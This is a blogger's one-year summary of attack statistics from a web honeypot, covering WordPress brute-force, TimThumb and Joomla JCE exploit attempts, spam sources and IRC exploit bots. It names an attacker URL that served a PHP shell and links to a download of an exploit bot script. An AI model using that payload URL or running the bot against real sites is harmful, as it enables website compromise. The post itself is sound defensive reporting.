[en] A year of Web Attacks

My Web Honeypot reach the first year, so i decide to write a sumary with some statistics.

Some informations about this Web Honeypot.
The address : https://www.malekal.com/modsec/
The attacks detections are made by modsecyrity module, all the attacks are grabed and injected in a database.
The IPs are blacklisted for one hour.

General informations

Below a screenshot of the attacks per day.
The peak are big WordPress Bruteforce Attack.
The last increase are du to a better detections for spam and a Joomla JCE Attacks campaign




So, from 2014-09-13 to 2014-09-13 we got a total of 21516 attacks and :

  • 10262 WordPress Bruteforce attacks
  • 1405 WordPress TimThumb Attacks
  • 2132 Joomla JCE Attacks
  • 5401 Spam attacks – and it miss a lot

First surprise, my website is a WordPress and i got more Joomla Attacks than WordPress TimThumb.
Not so much ShellShock scan.


Not mentionned but also 52 PHP exploits attacks used to spread BossaBot sometimes ago.


About netname

CHINANET is far to be the first netname as the source and the second is OVH.

Capture du 2014-10-16 19:36:08

OVH moved after the Nuclear Pack story  and some tweets.
We can see a decrease around february 2014.

Capture du 2014-10-16 19:45:42

Spam Attacks

Most of the Spam attacks are spam comments on my WordPress.

China is far to be the first source with 73.6% : https://www.malekal.com/modsec/graph_categories.php?t=1&a=spam
The second is Ukrainia 16.4%


As you can see, CHINANET-FJ is the first netname with 56.9%, the second netname is UNICOM-FJ6PUTIAN-MAN (15,7%)
Blocking this netname will probably reduce the spam on your blog.
Screenshot of the attacks from CHINANET-FJ (the last increase is du to a better spam detection). Around 60 attempts per day.



WordPress Timthumb and JCE Joomla

Theses vulnerabilities are exploited to upload PHP Shell or form Upload.

A WordPress Thimthumb attempt : https://www.malekal.com/modsec/index.php?ip= – remote URL is  flickr.com.hotelkouris.gr/xp.php and lead to a PHP Shell :

Web_injection3 Web_injection_PHPShellor https://www.malekal.com/modsec/index.php?ip=  that upload a form upload














on the hackers side, there a a lot of bots availaible in some IRCd  to scan for website and exploit severals vulnerabilities.
Example of availaible commands for some bots.
Notice that the bots dont have Shellshock scan.

Bot_help Bot_help2


   JCE_hack_attempt2 JCE_hack_attempt3 JCE_hack_attempt4


Zen Hack


Magento Shop Exploit



As you can see, most of the attempts are blind and use websearch dork to reach websites.
That can explain why i got more JCE attempt than WordPress, depend of the dork use.
Also a website with a great rank will probably get more attempt that others.
You can find a script of theses bot on this link : http://pjjoint.malekal.com/files.php?read=20141016_k8m6t10y9h6

Most of theses group selling mailer, shell etc, probably from hacked website.

BlackUnix Crew

I came accross a crew that seems to be very active, they call them BlackUnix Crew.

They got some bots to exploit :






DDoS stuffs :



Defacing :


Cardings stuffs :


of course, they are more professionnal and discreet group that hit websites depending of extension/CMS etc.

(Visité 7 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Les Tags : #Windows10 - #Windows - #Tutoriel - #Virus - #Antivirus - #navigateurs WEB - #Securité - #Réseau - #Internet